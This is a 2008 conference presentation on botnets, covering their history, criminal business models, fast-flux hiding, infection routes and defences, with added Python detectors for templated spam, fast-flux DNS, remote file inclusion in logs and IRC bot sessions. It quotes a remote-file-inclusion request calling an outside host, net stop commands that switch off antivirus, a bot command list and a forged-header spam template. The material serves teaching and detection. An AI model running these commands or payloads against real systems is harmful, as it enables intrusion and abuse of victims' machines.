
Botnets and the Army of Darkness

A Presentation
For
Educause Security Professionals 2008
by
Craig A Schiller, CISSP-ISSMP, ISSAP
Portland State University
CISO
craigs@pdx.edu
Copyright Craig Schiller, 2008. This work is the intellectual property of the author.
Permission is granted for this material to be shared for non-commercial, educational
purposes, provided that this copyright statement appears on the reproduced
materials and notice is given that the copying is by permission of the author. To
disseminate otherwise or to republish requires written permission from the author.

Presentation materials from
2008 Craig A Schiller

Handbook Against the AOD

Agenda

Botnet Overview
Botnet Schemes
How Do They Get In?
What Can We Do?
Concluding Thoughts

Why are We Here?

A Microsoft senior security manager called botnets the biggest threat of 2007.
Vint Cerf, one of the founders of the Internet, told a global finance conference that as many as a quarter of all computers belong to botnets.
Norman Elton and Matt Keel of the College of William & Mary, in a 2005 presentation, called bot networks "the single greatest threat facing humanity".
John Canavan, in "The Evolution of Malicious IRC Bots" (Symantec), says that botnets are the most dangerous and widespread Win32 viral threat.
Microsoft reports that of the 5.7 million unique Windows systems from which the MSRT removed malware, 62% were found to have a Trojan or bot client.
Ryan Naraine, writing for eWeek, said that botnets are the key hub for well-organized crime rings around the globe, using stolen bandwidth from drone zombies to make money from nefarious Internet activity.

Viruses, Worms, Trojans, and Botnets

Virus: autonomous malicious code that infects boot sectors or files but cannot spread itself to another computer on its own. Originally carried between machines on floppy disks, later by email or web download.
Worm: autonomous malicious code that spreads across the network by itself, via email or by exploiting network vulnerabilities.
Trojan: malicious code that poses as legitimate code to get the user to execute it.
Remote Access Trojan: malicious code that poses as legitimate code to gain access, then lets the operator take remote control of the victim's computer.
Bot client / zombie: malicious code that lets a victim's computer be controlled by an agent. The agent makes it easy for the operator (called a bot herder) to manage and operate tens or hundreds of thousands of clients.
Army of Darkness: collectively, all of the zombies controlled by bot herders.

What makes a Bot a Bot?

(Diagram: a traditional botnet. One C&C server talks to 100 to 100,000 bot clients over the IRC protocol.)

In the original use of the term Bot, the bot client contained malicious code that would retrieve and execute commands that were sent by the botherder.

What makes a Bot a Bot? (2)

(Diagram: the C&C server reaches bots over IRC, and also remote-controlled clients that run no bot code at all but are driven through Terminal Services, VNC, RDP, Carbon Copy, Back Orifice or SubSeven.)

Now, many include the systems that execute commands of the botherder even if the malicious code is not present. These systems are remotely controlled. They would be considered bot clients if they were part of a net of remotely controlled clients, even if the bot mechanism is somewhere else.

Botnet Commands

Command             What it does
bot.command         Runs a command with system()
bot.flushdns        Flushes the bot's DNS cache
bot.quit            Quits the bot
bot.longuptime      If uptime is more than 7 days, bot will respond
bot.sysinfo         Displays the system info
bot.status          Gives status
bot.rndnick         Generates a new random nick
bot.remove          Removes the bot
bot.open            Opens a file
bot.nick            Changes the bot's nickname
bot.id              Displays the current code ID
shell.disable       Disables the shell handler
shell.enable        Enables the shell handler
shell.handler       Fallback handler for shell
commands.list       Lists all available commands
plugin.unload       Unloads a plug-in (not supported yet)
plugin.load         Loads a plug-in
inst.svcdel         Deletes a service
inst.svcadd         Adds a service
mac.login           Logs the user in
mac.logout          Logs the user out
ftp.update          FTPs and updates the bot
ftp.execute         FTPs and executes a file
ftp.download        Downloads a file from FTP
http.visit          Visits a URL with a specific referrer
http.update         Updates the bot from HTTP
http.execute        Executes a file from an HTTP URL
http.download       Downloads a file from HTTP
rsl.logoff          Logs the user off
rsl.shutdown        Shuts the computer down
rsl.reboot          Reboots the computer
pctrl.kill          Kills a process
pctrl.list          Lists all processes
ddos.httpflood      Starts an HTTP flood
redirect.stop       Stops all redirects running
redirect.https      Starts an HTTP Secure proxy
redirect.http       Starts an HTTP proxy
harvest.aol         Makes the bot get AOL data
harvest.emailshttp  Gets a list of e-mails via HTTP
harvest.emails      Gets a list of e-mails

Source: Joe Stewart, SecureWorks

Evolution of Bot Technology

A timeline showing the introduction of bots and bot technology (timeline dated March 3, 2007):

1988  Invention of IRC.
1989  Greg Lindahl invents GM, the first bot. GM plays Hunt the Wumpus with IRC users.
1999  Pretty Park discovered: the first worm to use an IRC server as a means of remote control.
1999  SubSeven trojan/bot: a remote control trojan that added control via IRC.
2000  GT Bot, mIRC based. Runs scripts in response to IRC server events; supports raw TCP and UDP socket connections.
2002  SDBot, written in C++. Source code available to the hacker community; small, single binary.
2002  AgoBot (Gaobot) introduces modular design: the 1st module breaks in and downloads the 2nd module; the 2nd module turns off anti-virus, hides from detection and downloads the 3rd module; module 3 has the attack engines/payload.
2003  SpyBot: spyware capabilities (keylogging, data mining for email addresses, lists of URLs, etc.).
2003  RBot: most prevalent bot today. Spreads through weak passwords; easily modifiable; uses packaging software.
2004  PolyBot: a derivative of AgoBot with polymorphic ability; changes the look of its code on every infection.
2005  MYTOB: MyDoom mass-emailing worm with bot IRC C&C.

Why Do They Do It?

$

"I have ways of making money that you know nothing of." John D. Rockefeller

Russian Business Network

12 Levashovskiy Prospect, 197110 Saint Petersburg, RU

Ref: Russian Business Network study, by David Bizeul, bizeul.org, 11/21/07

RBN Operations

Services: some external services are used by RBN and affiliates. Those services can be MX relay or NS hosting.
RBN: this is the core business of RBN. It is used to offer hosting for cybercrime. Inside this part we can identify the direct subsidiaries of RBN: Nevacon and Akimon.
Hosting: this is the part used to host most of RBN's public websites and to register RBN domain names. Hosting and registration is a really strong partner for RBN; incidentally, it could be possible that those two blocks are under the same company.
Telecom: this is the entity which aims at providing the Internet access. It seems that SBTel has obtained, through Silvernet, access to the Saint Petersburg Internet Exchange Point (SPBIX).

Ref: bizeul.org, 11/21/07

RBN Operations (diagram)

(Diagram of the entities around RBN: SILVERNET, CREDOLINK, RBN, OINVEST, SPB IX, DELTASYS, INFOBOX, DATAPOINT. Ref: bizeul.org, 11/21/07)

RBN Hosted Domains (as of 11/15/07)

Network (/24)   Domains  Owner                               Country
81.0.250.0         1018  UPL TELECOM (Casablanca INT)        CZ
81.95.147.0          49  RBN                                 RU
194.146.207.0        23  RBN/Nevacon                         RU
81.95.149.0          21  RBN                                 RU
81.95.150.0          17  RBN                                 RU
58.65.239.0          13  HostFresh                           HK
193.33.129.0         11  Disk Limited                        TW
209.85.51.0          10  EVRY-318 (Direct Information FZC)   AE
81.95.144.0           9  RBN                                 RU
85.249.143.0          7  DATAPOINT                           RU
88.255.90.0           7  AbdAllah Internet Hizmetleri        TR
81.95.148.0           6  RBN                                 RU
58.65.238.0           5  Hostfresh                           HK
74.52.55.0            5  ThePlanet.com                       US
203.121.67.0          3  TIME Telecommunications Sdn Bhd     MY
81.95.145.0           3  RBN                                 RU
81.95.146.0           2  RBN                                 RU
88.255.94.0           2  AbdAllah Internet Hizmetleri        TR
91.193.56.0           2  Disk Limited                        TW

Botnet animation

Denial of Service Attack

Botnet Life Cycle

Modular
Adaptive
Targetable

Spam

"Spam Made Up 94% Of All E-Mail In December" (InformationWeek article title, January 2007)

Botnets and Spam

Spam Template
Received: from 192.168.0.%RND_DIGIT
(203-219-%DIGSTAT2-%STATDIG.%RND_FROM_DOMAIN [203.219.%DIGSTAT2.%STATDIG])
by mail%SINGSTAT.%RND_FROM_DOMAIN (envelope-from %FROM_EMAIL)
(8.13.6/8.13.6) with SMTP id %STATWORD for <%TO_EMAIL>; %CURRENT_DATE_TIME
Message-Id: <%RND_DIGIT[10].%STATWORD@mail%SINGSTAT.%RND_FROM_DOMAIN>
From: "%FROM_NAME" <@%FROM_EMAIL>
X-Spam-Flag: YES
X-Scanned-By: milter-spamc/0.25.321 (localhost [0.0.0.0]); Thu, 01 Mar 2007
09:14:01 -0600
X-Scanned-By: milter-spamc/0.25.321 (miconsulting.com [66.34.157.130]);
Thu, 01 Mar 2007 09:14:01 -0600
X-Spam-Status: YES, hits=8.60 required=5.00
X-Spam-Level: xxxxxxxx
Subject: [SPAM]
Status: RO
%TO_CC_DEFAULT_HANDLER
Subject: %SUBJECT
Sender: "%FROM_NAME" <%FROM_EMAIL>
Mime-Version: 1.0
Content-Type: text/html
Date: %CURRENT_DATE_TIME
%MESSAGE_BODY
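
The following Python is an added example, not code from the slides or from the spam engine the template came from. It renders messages from a trimmed copy of the template above. The macro semantics (which macros are fresh on every use, which are fixed for the life of one message), the sample field values and the sender domains are assumptions made for the example. What it shows is that every rendered message carries fresh Received and Message-Id values while the forged Received line stays internally consistent, which is why header-hash blocklists miss templated spam, and it adds a check for macros left unexpanded, a cheap engine fingerprint when a bot's rendering slips.

```python
import random
import re

# Trimmed copy of the template shown above, constructed for this example;
# only the lines that carry macros are kept.
SPAM_TEMPLATE = (
    "Received: from 192.168.0.%RND_DIGIT "
    "(203-219-%DIGSTAT2-%STATDIG.%RND_FROM_DOMAIN [203.219.%DIGSTAT2.%STATDIG])\n"
    "\tby mail%SINGSTAT.%RND_FROM_DOMAIN (envelope-from %FROM_EMAIL)\n"
    "\t(8.13.6/8.13.6) with SMTP id %STATWORD for <%TO_EMAIL>; %CURRENT_DATE_TIME\n"
    "Message-Id: <%RND_DIGIT[10].%STATWORD@mail%SINGSTAT.%RND_FROM_DOMAIN>\n"
    'From: "%FROM_NAME" <%FROM_EMAIL>\n'
    "Subject: %SUBJECT\n"
    "Date: %CURRENT_DATE_TIME\n"
    "\n"
    "%MESSAGE_BODY\n"
)

# Constructed per-campaign values (assumed, not from any real campaign).
SAMPLE_FIELDS = {
    "FROM_NAME": "Richard Mason",
    "FROM_EMAIL": "rmason@example.net",
    "TO_EMAIL": "victim@example.edu",
    "SUBJECT": "Making Dollars and Sense Now is The Time!",
    "CURRENT_DATE_TIME": "Thu, 01 Mar 2007 09:14:01 -0600",
    "MESSAGE_BODY": "SymboL: PSCP  Current Price: $0.35",
}
SAMPLE_DOMAINS = ["example.net", "example.org", "example.com"]

# %NAME or %NAME[len]
MACRO_RE = re.compile(r"%([A-Z][A-Z_0-9]*)(?:\[(\d+)\])?")


def expand_template(template, fields, domains, rng):
    """Render one message from the template.

    Assumed macro semantics (the bot's real rules are not on the page):
      * names present in `fields` are copied in verbatim;
      * %RND_DIGIT[n] yields n fresh digits on every use;
      * everything else (DIGSTAT2, STATDIG, SINGSTAT, STATWORD,
        RND_FROM_DOMAIN) is generated once and reused for the rest of the
        message, so the forged Received: line agrees with itself and with
        the Message-Id.
    `rng` is a random.Random so a seed gives a reproducible message."""
    once = {}

    def digits(n):
        return "".join(rng.choice("0123456789") for _ in range(n))

    def fill(m):
        name, length = m.group(1), m.group(2)
        if name in fields:
            return fields[name]
        if name == "RND_DIGIT":
            return digits(int(length) if length else 1)
        if name not in once:
            if name == "RND_FROM_DOMAIN":
                once[name] = rng.choice(domains)
            elif name == "DIGSTAT2":
                once[name] = digits(2)
            elif name in ("STATDIG", "SINGSTAT"):
                once[name] = digits(1)
            elif name == "STATWORD":
                once[name] = "".join(
                    rng.choice("abcdefghijklmnopqrstuvwxyz") for _ in range(8))
            else:
                raise KeyError(f"unknown macro %{name}")
        return once[name]

    return MACRO_RE.sub(fill, template)


def render_message(seed, fields=SAMPLE_FIELDS, domains=SAMPLE_DOMAINS):
    """One message per seed; different seeds give different headers."""
    return expand_template(SPAM_TEMPLATE, fields, domains, random.Random(seed))


def leaked_macros(message):
    """Macro names still present in a message. A campaign that ships with a
    macro unexpanded hands you a string to match on."""
    return sorted({m.group(1) for m in MACRO_RE.finditer(message)})


def forged_received_consistent(message):
    """True when the forged Received: line's PTR-style host name and its
    bracketed address carry the same 203.219.x.y octets, as the template
    intends; a mismatch would betray the forgery."""
    m = re.search(r"203-219-(\d\d)-(\d)\.\S+ \[203\.219\.(\d\d)\.(\d)\]", message)
    return bool(m) and m.group(1) == m.group(3) and m.group(2) == m.group(4)
```

Render a few seeds and diff the Received and Message-Id lines to see how little two messages from the same run have in common; the only stable strings are the Sendmail version and the structure itself, which is what content-agnostic detection has to key on.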

Pump & Dump Stocks

(Sample spam message)

Making Dollars and Sense Now is The Time!

SymboL: PSCP
Current Price: $0.35
5 Day Target price: 1.75
Action: Aggresive Buy

Underbanked consumers are an opportunity investors can't afford to miss, especially as new research reveals a closer look at the breadth and potential of the market. According to a new study by BearingPoint and Visa, approximately 84 million people are un- and underbanked, representing $1.1 trillion in income. Assuming these consumers spend 1% of their income to pay for financial services, that amounts to $11 billion. And that is at 1%! Not bad work if you can get it.

How Much Do They Make?

Blue Security, a security company that took on spammers aggressively, underwent a Distributed Denial of Service (DDoS) attack from zombie computers under the control of a Russian-speaking spammer.
This spammer (or spam gang), which we called PharmaMaster, claimed to make $3M a month off of spam.
Unwilling to give up that income, he paid a hacker $2,000 an hour to perform the DDoS against Blue Security.
It cost him over $1M by the time all was said and done.
It exhausted the funding of Blue Security and they were forced to close shop.

Botnets and Movie Theft

Release group hires or uses a botnet for storage and distribution.
15% of losses attributed to college students.

Botnets and Clicks-4-Hire

"Bot-driven fraud has become such a big business that Google was recently sued by class-action plaintiffs who claimed that bots, not people, had clicked on their ads. The ads were priced based on how many clicks they received; apparently competitors had hired bots to jack up the rate with an avalanche of extra clicks. Charged with negligence for failing to guard against such abuses, Google settled for $90 million."
"Attack of the Bots", by Scott Berinato, Wired 14.11, November 2006

Extortion

"We've encrypted your files. Pay me for the key to decrypt them."
"We're DDoSing your website. Pay me to stop."
"Pay me not to start."

In 2004, botnets attacked dozens of online gambling sites. The bookmakers were told to pay between $10,000 and $50,000 to get their sites back online. (Wired, Nov 2006)

But, of course: "Once you have paid him the Dane-geld, you never get rid of the Dane." Dane-geld (A.D. 980-1016), by Rudyard Kipling

Theft: Identity and Other

Keystroke logging attacks
Harvesting credit cards, SSANs, keys, passwords

An IRC channel listing (numeric 322, RPL_LIST) advertising stolen card data ("fulls" are complete card or identity records; a "WU drop" is someone who receives Western Union transfers for the seller):
[11:23] *** :newyork.ny.us.somewhere.org 322 Justlooking #cards 73 : Welcome. WGeTz sell fulls, msg HIM. NEW -> (Link: www.kentmintek.com/coolindex.html) www.kentmintek.com/coolindex.html . WGeTz needs ITALY WU DROP.

Theft: Identity and Other (2)

Phishing attacks
Pharming attacks

Phishing Overview

(Diagram: one botnet client hosts the phishing website; another botnet client sends the spam that points victims to it.)

Money Mule

1. Fraudsters contact prospective victims:
"I am Mr. Richard H. Mason President/CEO MM Group Handling. We are a trading company that is into the hire, sales and service of Electrical Trucks, Fork Trucks and associated materials handling equipments and diverse range of battery for electric vehicles which can be readily adapted for customers specific requirements to the America and selected locations in Europe. We are searching for individuals or a company who can act as our representative/payment agent in your country and earn 10% of every payment made through you to us."
2. The crime rings persuade the victim to come and work for their fake company.
3. Money mules receive funds into their accounts. These funds are stolen from other accounts that have been compromised.
4. Mules are then asked to take these funds out of their accounts and forward them overseas (minus a commission payment), typically using a wire transfer service.
Source: Bank Safe Online

Strategy Against Botnets

Cut off the head of the snake and the body will follow.
Unless, of course, your snake is a Hydra.

How Do Botherders Protect the C&C?

Multi-homed DNS: the FQDN maps to 3 or more IP addresses, e.g.
botnet1.example.com pointing to 127.0.0.1
botnet1.example.com pointing to 127.0.0.2
botnet1.example.com pointing to 127.0.0.3
botnet1.example.com pointing to 127.0.0.4
botnet1.example.com pointing to 127.0.0.5
botnet1.example.com pointing to 127.0.0.6

Dynamic DNS used through a commercial site: change IP addresses quickly; short DNS TTLs for clients; remap DNS often, check at boot.

Fast-flux DNS: change IP addresses and/or DNS names quickly (for spam, in under 5 minutes) and often.
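
An added example, not part of the original slides, of the checks a resolver log or passive-DNS feed can apply to tell a fast-flux name from an ordinary multi-homed or load-balanced one. The lookup records are constructed (the slide's botnet1.example.com and the addresses here are placeholders), the thresholds are assumptions chosen for the example, and distinct /16 prefixes stand in for the per-address ASN lookup a production detector would do. The point it makes is that a short TTL alone proves nothing; it is the combination of many addresses, many networks and a different answer on every lookup that separates flux from a CDN.

```python
import ipaddress
from collections import namedtuple

# One DNS answer for the name under study: the TTL returned and the A records.
Lookup = namedtuple("Lookup", "ttl addrs")

# Constructed series of lookups of a flux name, a few minutes apart: every
# answer has a short TTL and brings addresses the previous answer did not,
# spread across many networks.
FLUX_LOOKUPS = [
    Lookup(180, ["10.1.2.3", "10.7.8.9", "10.20.1.1", "10.33.4.4", "10.90.2.2"]),
    Lookup(180, ["10.7.8.9", "10.44.1.9", "10.120.3.3", "10.33.4.4", "10.201.0.7"]),
    Lookup(180, ["10.44.1.9", "10.66.5.5", "10.120.3.3", "10.150.9.9", "10.201.0.7"]),
    Lookup(180, ["10.66.5.5", "10.3.3.3", "10.150.9.9", "10.188.1.1", "10.9.9.9"]),
]

# Constructed lookups of a legitimate load-balanced name: the TTL is even
# shorter, but the same small pool in one network comes back every time.
CDN_LOOKUPS = [
    Lookup(60, ["198.51.100.10", "198.51.100.11", "198.51.100.12"]),
    Lookup(60, ["198.51.100.11", "198.51.100.12", "198.51.100.10"]),
    Lookup(60, ["198.51.100.12", "198.51.100.10", "198.51.100.11"]),
    Lookup(60, ["198.51.100.10", "198.51.100.11", "198.51.100.12"]),
]


def flux_features(lookups):
    """Summarise a series of lookups of one name."""
    all_addrs = set()
    prefixes = set()
    churn = 0          # addresses present in a lookup but absent from the previous one
    prev = None
    for lk in lookups:
        cur = set(lk.addrs)
        all_addrs |= cur
        for a in cur:
            # /16 as a stand-in for "different network"; offline code cannot
            # do the ASN lookup a real detector would use here.
            prefixes.add(str(ipaddress.ip_network(a + "/16", strict=False)))
        if prev is not None:
            churn += len(cur - prev)
        prev = cur
    return {
        "distinct_addrs": len(all_addrs),
        "distinct_prefixes": len(prefixes),
        "new_addrs_per_lookup": churn / max(len(lookups) - 1, 1),
        "min_ttl": min(lk.ttl for lk in lookups),
    }


def is_fast_flux(lookups, min_addrs=5, min_prefixes=3, max_ttl=300, min_churn=1.0):
    """Heuristic with thresholds chosen for this example: a flux name rotates
    through many addresses in many networks on a short TTL, and each lookup
    returns addresses the previous one did not."""
    f = flux_features(lookups)
    return (f["distinct_addrs"] >= min_addrs
            and f["distinct_prefixes"] >= min_prefixes
            and f["min_ttl"] <= max_ttl
            and f["new_addrs_per_lookup"] >= min_churn)
```

Run it over a name you suspect by repeating the lookup a handful of times across a window longer than the TTL; the CDN case shows why the TTL threshold must be combined with the other features rather than used alone.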

Hiding the C&C Server or Phishing Website

(Animation.) The animation demonstrates a persistent phishing cluster detected and analyzed by InternetPerils using server addresses from 20 dumps of the APWG repository, the earliest shown 17 May and the latest 20 September. This phishing cluster continues to persist after the dates depicted, and InternetPerils continues to track it.

Botnets for Sale

Botnet ad on an IRC channel:
[11:07] *** :newyork.ny.us.someplace.org 322 Justlooking #Bot-Services 6 :(Lew|s-) Welcome. My BotNet is ready to be used. You would like to profit from it? Leave a msg on the channel, one @ will respond to you soon. Thank you!

"There may be millions of such PCs around the world doing the bidding of crime gangs, experts say, and they can be rented for as little as $100-per-hour." Home PCs rented out in sabotage-for-hire racket, by Bernhard Warner, Reuters

Fluid third-party exchange market (millions of hosts). Going rate for spam proxying: 3-10 cents/host/week. Seems small, but a 25k botnet gets you $40k-130k/yr. Raw bots: $0.01+/host; special orders ($50+). Geoffrey M. Voelker, UC San Diego

How Do They Get In?

1. Guessing weak passwords / phishing attacks
2. Exploiting network vulnerabilities
3. Using social engineering
4. Using web-based Trojans
   Trojan websites: game cheats
   Trojan websites: pornography
5. Using email-based Trojans
   Phishing & pharming
   Trojan downloads
6. Using IM-based Trojans (social engineering)

How Do They Get In? (remote file inclusion)

1. Attacker sends Target.com: GET /a.php?vuln=http://webhost.com/evil.php
2. Target.com makes a request to webhost.com/evil.php.
3. The malware PHP file evil.php is sent to Target.com and is executed by the include() function.
4. The output from evil.php is sent to the attacker.
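
The following Python is an added example, not code from the slides, that finds attempts of the kind diagrammed above in a web server's access log. The log lines are constructed for the example (the script name a.php and parameter name vuln follow the diagram; the hosts are documentation addresses), and the allowlist of our own hosts is an assumption. It looks for a parameter whose value is a remote URL, then weighs the tells that separate an inclusion attempt from a benign link parameter: a foreign host, a PHP stream wrapper, a script-like file name, the trailing "?" used to discard whatever the vulnerable script appends, and the %00 null byte used for the same purpose on older PHP.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache combined-format lines; not from a real server.
ACCESS_LOG = """\
203.0.113.5 - - [10/Mar/2008:14:02:11 -0800] "GET /a.php?vuln=http://webhost.example/evil.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [10/Mar/2008:14:02:15 -0800] "GET /a.php?vuln=http://webhost.example/evil.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.9 - - [10/Mar/2008:14:03:01 -0800] "GET /a.php?vuln=ftp://webhost.example/evil.php%00 HTTP/1.1" 200 0 "-" "libwww-perl/5.805"
198.51.100.7 - - [10/Mar/2008:14:05:40 -0800] "GET /a.php?vuln=pages/about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.8 - - [10/Mar/2008:14:06:02 -0800] "GET /index.php?redirect=http://www.example.edu/news HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
REMOTE_SCHEMES = ("http", "https", "ftp", "ftps", "php", "data")
OWN_HOSTS = ("www.example.edu",)   # assumed allowlist of our own web hosts


def rfi_indicators(value, own_hosts=OWN_HOSTS):
    """Reasons a parameter value looks like a remote-file-inclusion attempt;
    an empty list means it looks benign."""
    raw = unquote(value)
    has_nul = "\x00" in raw
    parts = urlsplit(raw.replace("\x00", ""))
    scheme = parts.scheme.lower()
    if scheme not in REMOTE_SCHEMES:
        return []
    reasons = ["remote scheme " + scheme]
    if scheme in ("php", "data"):
        reasons.append("PHP stream wrapper or inline data")
    elif parts.hostname and parts.hostname.lower() not in own_hosts:
        reasons.append("foreign host " + parts.hostname.lower())
    if parts.path.lower().endswith((".php", ".txt")):
        reasons.append("script-like file " + parts.path.rsplit("/", 1)[-1])
    if raw.endswith("?"):
        reasons.append("trailing '?' to discard appended path")
    if has_nul:
        reasons.append("null byte to truncate appended suffix")
    # A remote scheme on its own is not enough: a link back to one of our own
    # hosts (redirects, return URLs) is the common benign case.
    return reasons if len(reasons) > 1 else []


def scan_access_log(text):
    """Parse each line, walk every query parameter, collect the suspicious ones."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, when, method, target, status = m.groups()
        for name, val in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            reasons = rfi_indicators(val)
            if reasons:
                hits.append({"client": client, "time": when, "method": method,
                             "status": int(status), "param": name,
                             "value": val, "reasons": reasons})
    return hits
```

The three hits from 203.0.113.x are the attempts; the local path and the redirect to our own host are left alone. The same logic, expressed as a ModSecurity rule on ARGS, is the server-side control the "Protect Your Enterprise" list asks for, but a log pass like this is how you find out whether the rule is needed and whether it fired.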

Top 5 Reasons Why I Think I'm Safe

1. There's nothing important on my computer
2. My A/V program said I didn't have a virus
3. I checked and I didn't see anything
4. My corporate firewall will protect me
5. I have a Mac/Unix computer. They don't get viruses

I have a Mac/Unix computer.

Unix: the #1 platform for command & control servers.

Mac Trojan aimed at taking money from Mac users. Wired reported:
The Trojan comes disguised as a video-decoding plug-in that users are told they must install to watch free porn clips. Instead, the software burrows into the operating system and diverts some of the victim's future web surfing to sites under the attacker's control. It's the professional attack on Macs that the security community has long predicted, according to Dave Marcus, security research manager at McAfee's Avert Lab, who said it was "written by people who know how to write malware."
http://www.wired.com/politics/security/news/2007/11/mac_trojan

Firewall will protect me

Firewalls are designed to let traffic in.

I checked and I didn't see anything

Hidden32.exe permits applications to run without showing their GUI.
HideUserv2.exe adds an invisible user to the Administrators group.
User-mode rootkits
Kernel-mode rootkits

A/V Program Said No Virus

Commands a bot runs to switch off the A/V (the first line records the list of running services to a file named "starts"):
net start >>starts
net stop "Symantec antivirus client"
net stop "Symantec AntiVirus"
net stop "Trend NT Realtime Service"
net stop "Symantec AntiVirus"
net stop "Norton antivirus client"
net stop "Norton antivirus"
net stop "etrust antivirus"

The best bot seen left the A/V tray icon and a fake GUI in place.

Nothing Important

Your space, network, & processing power: child pornography; bestiality; stolen movies, games, & software.
Your access: student records; SSANs; university resources.
Your email
Your money
Your identity

Protect Your Enterprise

1. Ensure that all enterprise and local accounts have strong passwords. Configure domain security policy to enforce this and auto-lockout.
2. Eliminate all generic accounts. Where possible, make all non-user accounts service accounts.
3. Eliminate or encapsulate all unencrypted authentication.
4. Establish a perimeter and segregate valuable or dangerous network segments. Make firewall rules accountable and require change control.
5. Establish standards for web app and other development to eliminate avoidable coding vulnerabilities (e.g. use of ModSecurity for Apache websites).
6. Staff your anti-spam, anti-virus, abuse, proxy cache, and web filter processing efforts.
7. Install and operate IDS/IPS systems (like ourmon, snort, etc.).
8. Google your own site: site:mysite.com viagra
9. Actively scan your site for vulnerabilities.
10. Centralize and process logs, including workstation security and firewall logs.
11. Mine your anti-virus quarantines, abuse notifications and infected systems for intelligence about botnet infections.
12. Participate in or join quasi-intelligence organizations and use their data in your detection tools. Report new info: phishing attacks to www.castlecops.com/PIRT, botnet clients/C&C to isotf.org.

Botnet Client Communication

(Diagram of the client life cycle, as a sequence:)
1. Computer is exploited and becomes a bot. (This is the point where A/V detection happens, if it happens at all.)
2. The new bot rallies to the C&C to let the botherder know it has joined the team.
3. Retrieve the anti-A/V module from the download server.
4. Secure the new bot client.
5. Listen to the C&C server/peer for commands.
6. Retrieve the payload module from the download server.
7. Execute the commands (possible traffic to the victim).
8. Report the result to the C&C channel.
9. On command, erase all evidence and abandon the client.

How Do We Detect Them?

Bot detection is mostly behavioral.

Host based: A/V, anti-spam, anti-spyware; enterprise reporting; user help desk tickets; abuse notifications; quasi-intelligence organizations.
Monitoring & analysis: Ourmon; firewall & router logs; IDS/IPS, host and network; darknets, honeypots; DNS; server & workstation log analysis; malware analysis (sandbox); forensics.
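
An added example, not code from the slides or from Ourmon, of the behavioral check this section and the "Botnet Commands" table together suggest: walk a reconstructed IRC flow between one host and a server and score it on what a bot does in channel rather than on any signature of the binary. The session lines are constructed (client lines prefixed C:, server lines S:), the command list is the one from the Joe Stewart table earlier in the deck, and the [CC|OS]-digits nick template is an assumption about how such bots name themselves rather than something the slides state.

```python
import re

# Commands from the "Botnet Commands" slide (Joe Stewart, SecureWorks), as a
# herder would issue them in a PRIVMSG to the channel.
KNOWN_COMMANDS = {
    "bot.command", "bot.flushdns", "bot.quit", "bot.longuptime", "bot.sysinfo",
    "bot.status", "bot.rndnick", "bot.remove", "bot.open", "bot.nick", "bot.id",
    "shell.disable", "shell.enable", "shell.handler", "commands.list",
    "plugin.unload", "plugin.load", "inst.svcdel", "inst.svcadd",
    "mac.login", "mac.logout", "ftp.update", "ftp.execute", "ftp.download",
    "http.visit", "http.update", "http.execute", "http.download",
    "rsl.logoff", "rsl.shutdown", "rsl.reboot", "pctrl.kill", "pctrl.list",
    "ddos.httpflood", "redirect.stop", "redirect.https", "redirect.http",
    "harvest.aol", "harvest.emailshttp", "harvest.emails",
}

# Assumed bot nick template: [country|OS]-digits, e.g. [USA|XP]-81734.
TEMPLATED_NICK = re.compile(r"^\[[A-Z]{2,3}\|[A-Za-z0-9]+\][-_]?\d{3,}$")

LINE_RE = re.compile(r"^([CS]): (.*)$")
PRIVMSG_RE = re.compile(r"PRIVMSG (\S+) :(.*)$")

# Constructed flow of an infected host (C:) talking to a C&C server (S:).
BOT_SESSION = [
    "C: NICK [USA|XP]-81734",
    "C: USER xp 0 0 :xp",
    "C: JOIN #b0t5 s3cr3t",
    "S: :irc.example 001 [USA|XP]-81734 :Welcome",
    "S: :[USA|XP]-81734!xp@203.0.113.7 JOIN :#b0t5",
    "S: :herder!h@192.0.2.1 PRIVMSG #b0t5 :.http.update http://192.0.2.5/bot.exe bot.exe 1",
    "S: :herder!h@192.0.2.1 PRIVMSG #b0t5 :.ddos.httpflood http://victim.example/ 600 100",
    "C: PRIVMSG #b0t5 :[HTTP]: Update from http://192.0.2.5/bot.exe complete",
]

# Constructed flow of a person on an ordinary channel.
BENIGN_SESSION = [
    "C: NICK craig",
    "C: USER craig 0 0 :Craig",
    "C: JOIN #linux",
    "S: :craig!c@198.51.100.3 JOIN :#linux",
    "S: :bob!b@198.51.100.4 PRIVMSG #linux :anyone tried the new kernel?",
    "C: PRIVMSG #linux :not yet, waiting for the point release",
]


def analyse_irc_session(lines):
    """Collect bot indicators from one client/server IRC flow.
    Returns the reasons found and the herder commands seen, in order."""
    reasons, commands = [], []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        direction, msg = m.groups()
        if direction == "C" and msg.startswith("NICK "):
            nick = msg.split(None, 1)[1].strip()
            if TEMPLATED_NICK.match(nick):
                reasons.append(f"templated nick {nick}")
        pm = PRIVMSG_RE.search(msg)
        if pm:
            target, text = pm.groups()
            words = text.split()
            first = words[0].lstrip(".!").lower() if words else ""
            if first in KNOWN_COMMANDS:
                commands.append(first)
                reasons.append(f"bot command {first} to {target}")
            # Bots answer in channel with a bracketed status tag, e.g. [HTTP]:
            if direction == "C" and text.startswith("[") and "]:" in text:
                reasons.append("bracketed status report to channel")
    return {"reasons": reasons, "commands": commands}


def is_bot_session(lines):
    """Any known herder command is decisive; otherwise two soft indicators."""
    r = analyse_irc_session(lines)
    return bool(r["commands"]) or len(r["reasons"]) >= 2
```

Fed with flows reassembled from a span port (the channel name, the key on JOIN and the server port are irrelevant to it), this flags the infected host on the first command it is given, which is usually the update that fetches the next module of the life cycle above. It misses bots whose commands are renamed or encoded, which is why the nick and status-report checks are there as a second opinion.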

Quasi-Intelligence Organizations

Mailing lists:
REN-ISAC
Botnets: http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Phishing: http://www.whitestar.linuxbox.org/mailman/listinfo/phishing
NANOG
Castlecops.com: MIRT, PIRT
Vendor lists
ISC Storm Center
Shadowserver
APWG
Bleeding Threats firewall rules: http://www.bleedingthreats.net/fwrules/

Closing Thoughts

